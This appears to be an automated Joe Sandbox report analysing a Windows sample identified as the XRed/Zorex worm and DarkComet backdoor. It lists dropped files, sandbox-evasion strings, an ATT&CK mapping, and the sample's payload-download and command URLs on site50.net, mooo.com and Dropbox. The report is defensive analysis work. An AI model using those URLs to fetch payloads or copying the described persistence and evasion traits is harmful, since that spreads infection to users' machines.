                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeDropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeDropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)Jump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeDropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\SET8E7C.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeDropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\SET8EBB.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dllJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_2-3756
                          Source: C:\Users\user\Desktop\._cache_file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-3055
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7640Thread sleep count: 124 > 30Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7640Thread sleep time: -7440000s >= -30000sJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4944Thread sleep time: -60000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01001C7F lstrcpyA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcmpA,lstrcmpA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_01001C7F
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004B1A lstrcpyA,GetSystemInfo,lstrcpyA,CreateDirectoryA,RemoveDirectoryA,2_2_01004B1A
                          Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                          Source: Amcache.hve.21.drBinary or memory string: VMware
                          Source: Amcache.hve.21.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.21.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.21.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.21.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.21.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.21.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.21.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000003.1406374829.0000000001234000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.21.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.21.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.21.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.21.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.21.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.21.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.21.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.21.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.21.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.21.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.21.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.21.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.21.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.21.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.21.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.21.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.21.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.21.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.21.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.21.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                          Source: Amcache.hve.21.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Users\user\Desktop\._cache_file.exeAPI call chain: ExitProcess graph end nodegraph_2-2861
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100198B LocalFree,RegCreateKeyExA,wsprintfA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetModuleFileNameA,RegCloseKey,wsprintfA,lstrlenA,RegSetValueExA,RegCloseKey,LocalFree,2_2_0100198B
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100168B GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,2_2_0100168B
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01005D22 GetVersionExA,GetSystemMetrics,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,2_2_01005D22
                          Source: Amcache.hve.21.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.21.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.21.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.21.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                          Source: Amcache.hve.21.drBinary or memory string: MsMpEng.exe

                          Stealing of Sensitive Information

                          barindex
                          Yara detected XRed
                          Source: Yara matchFile source: file.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6428, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX8506.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected XRed
                          Source: Yara matchFile source: file.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6428, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX8506.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information41
                          Scripting                          		2
                          Replication Through Removable Media                          		2
                          Native API                          		41
                          Scripting                          		1
                          Access Token Manipulation                          		32
                          Masquerading                          		OS Credential Dumping1
                          Query Registry                          		Remote Services1
                          Archive Collected Data                          		11
                          Encrypted Channel                          		Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          Registry Run Keys / Startup Folder                          		11
                          Process Injection                          		11
                          Virtualization/Sandbox Evasion                          		LSASS Memory111
                          Security Software Discovery                          		Remote Desktop ProtocolData from Removable Media3
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading                          		1
                          Registry Run Keys / Startup Folder                          		1
                          Access Token Manipulation                          		Security Account Manager1
                          Process Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          DLL Side-Loading                          		11
                          Process Injection                          		NTDS11
                          Virtualization/Sandbox Evasion                          		Distributed Component Object ModelInput Capture34
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Obfuscated Files or Information                          		LSA Secrets11
                          Peripheral Device Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading                          		Cached Domain Credentials4
                          File and Directory Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          File Deletion                          		DCSync15
                          System Information Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583475 Sample: file.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 74 58 freedns.afraid.org 2->58 60 xred.mooo.com 2->60 62 4 other IPs or domains 2->62 70 Suricata IDS alerts for network traffic 2->70 72 Found malware configuration 2->72 74 Antivirus detection for URL or domain 2->74 78 13 other signatures 2->78 8 file.exe 1 6 2->8         started        11 EXCEL.EXE 2->11         started        13 Synaptics.exe 2->13         started        signatures3 76 Uses dynamic DNS services 58->76 process4 file5 42 C:\ProgramData\Synaptics\Synaptics.exe, PE32 8->42 dropped 44 C:\ProgramData\Synaptics\RCX8506.tmp, PE32 8->44 dropped 46 C:\...\Synaptics.exe:Zone.Identifier, ASCII 8->46 dropped 48 C:\Users\user\Desktop\._cache_file.exe, PE32 8->48 dropped 15 ._cache_file.exe 1 7 8->15         started        18 Synaptics.exe 122 8->18         started        process6 dnsIp7 50 C:\Users\user\AppData\Local\...\dxwsetup.exe, PE32 15->50 dropped 52 C:\Users\user\AppData\Local\...\dsetup32.dll, PE32 15->52 dropped 54 C:\Users\user\AppData\Local\...\dsetup.dll, PE32 15->54 dropped 22 dxwsetup.exe 263 15->22         started        64 drive.usercontent.google.com 142.250.186.129, 443, 49740, 49741 GOOGLEUS United States 18->64 66 docs.google.com 216.58.206.78, 443, 49730, 49731 GOOGLEUS United States 18->66 68 2 other IPs or domains 18->68 56 C:\Users\user\Documents\CZQKSDDMWR\~$cache1, PE32 18->56 dropped 80 Antivirus detection for dropped file 18->80 82 Multi AV Scanner detection for dropped file 18->82 84 Drops PE files to the document folder of the user 18->84 86 Machine Learning detection for dropped file 18->86 26 WerFault.exe 18->26         started        28 WerFault.exe 18->28         started        30 WerFault.exe 18->30         started        32 4 other processes 18->32 file8 signatures9 process10 file11 34 C:\Windows\SysWOW64\...\dsetup32.dll (copy), PE32 22->34 dropped 36 C:\Windows\SysWOW64\...\dsetup.dll (copy), PE32 22->36 dropped 38 C:\Windows\SysWOW64\directx\...\SET8EBB.tmp, PE32 22->38 dropped 40 101 other files (100 malicious) 22->40 dropped 88 Writes many files with high entropy 22->88 signatures12

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe92%ReversingLabsWin32.Worm.Zorex
                          file.exe100%AviraTR/Dldr.Agent.SH
                          file.exe100%AviraW2000M/Dldr.Agent.17651006
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\Documents\CZQKSDDMWR\~$cache1100%AviraTR/Dldr.Agent.SH
                          C:\Users\user\Documents\CZQKSDDMWR\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                          C:\ProgramData\Synaptics\RCX8506.tmp100%AviraTR/Dldr.Agent.SH
                          C:\ProgramData\Synaptics\RCX8506.tmp100%AviraW2000M/Dldr.Agent.17651006
                          C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                          C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                          C:\Users\user\Documents\CZQKSDDMWR\~$cache1100%Joe Sandbox ML
                          C:\ProgramData\Synaptics\RCX8506.tmp100%Joe Sandbox ML
                          C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                          C:\ProgramData\Synaptics\RCX8506.tmp94%ReversingLabsWin32.Backdoor.DarkComet
                          C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Worm.Zorex
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe0%ReversingLabs
                          C:\Users\user\Desktop\._cache_file.exe0%ReversingLabs
                          C:\Users\user\Documents\CZQKSDDMWR\~$cache194%ReversingLabsWin32.Backdoor.DarkComet
                          C:\Windows\SysWOW64\directx\websetup\SET8E7C.tmp0%ReversingLabs
                          C:\Windows\SysWOW64\directx\websetup\SET8EBB.tmp0%ReversingLabs
                          C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)0%ReversingLabs
                          C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://xred.site50.net/syn/SUpdate.ini0&100%Avira URL Cloudmalware
                          http://www.betaplace.com.0%Avira URL Cloudsafe
                          http://www.betaplace.com0%Avira URL Cloudsafe
                          https://drive.userconten0%Avira URL Cloudsafe
                          http://xred.site50.net/syn/Synaptics.rard100%Avira URL Cloudmalware
                          http://www.BetaPlace.comEContinuare0%Avira URL Cloudsafe
                          http://www.betaplace.com.DInstalacn0%Avira URL Cloudsafe
                          http://www.BetaPlace.com.?0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          freedns.afraid.org
                          		69.42.215.252
                          		truefalse
                            		high
                            docs.google.com
                            		216.58.206.78
                            		truefalse
                              		high
                              s-part-0017.t-0009.t-msedge.net
                              		13.107.246.45
                              		truefalse
                                		high
                                drive.usercontent.google.com
                                		142.250.186.129
                                		truefalse
                                  		high
                                  xred.mooo.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    xred.mooo.comfalse
                                      		high
                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            http://xred.site50.net/syn/SUpdate.ini0&file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://drive.usercontent.google.com/download?idkSynaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlTfile.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://drive.usercontenSynaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://drive.usercontent.google.com/Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2358747058.000000001DF48000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://xred.site50.net/syn/Synaptics.rarfile.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://xred.site50.net/syn/Synaptics.rardfile.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://docs.google.com/Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.BetaPlace.com.?._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278195181.00000000002DD000.00000002.00000001.01000000.00000007.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://xred.site50.net/syn/SSLLibrary.dlfile.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.usercontent.google.com/ISynaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.betaplace.com.DInstalacn._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278195181.00000000002DD000.00000002.00000001.01000000.00000007.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.betaplace.com.._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000003.1287300089.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, SET8EBB.tmp.6.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://xred.site50.net/syn/SUpdate.inifile.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.betaplace.com._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278195181.00000000002DD000.00000002.00000001.01000000.00000007.sdmp, dxwsetup.exe, 00000006.00000003.1287300089.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, SET8EBB.tmp.6.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://drive.usercontent.google.com/download?Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.BetaPlace.comEContinuare._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278195181.00000000002DD000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://docs.google.com/uc?id=0;Synaptics.exe, 00000004.00000002.2328156074.000000001037E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2339136007.000000001823E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2342635471.000000001AB7E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978tfile.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.BetaPlace.com._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278195181.00000000002DD000.00000002.00000001.01000000.00000007.sdmp, dxwsetup.exe, 00000006.00000003.1287300089.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, SET8EBB.tmp.6.drfalse
                                                                        		unknown
                                                                        http://xred.site50.net/syn/SSLLibrary.dllfile.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.250.186.129
                                                                          		drive.usercontent.google.comUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          216.58.206.78
                                                                          		docs.google.comUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          69.42.215.252
                                                                          		freedns.afraid.orgUnited States
                                                                          		17048AWKNET-LLCUSfalse

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1583475
                                                                          Start date and time:2025-01-02 20:27:36 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 8m 11s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:41
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:file.exe
                                                                          Detection:MAL
                                                                          Classification:mal74.rans.troj.expl.winEXE@16/214@14/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 50%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 26
                                                                          • Number of non-executed functions: 40
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 52.109.76.240, 23.212.89.111, 52.113.194.132, 184.28.90.27, 20.42.73.28, 20.42.73.29, 13.107.246.45, 40.126.32.138, 4.175.87.197
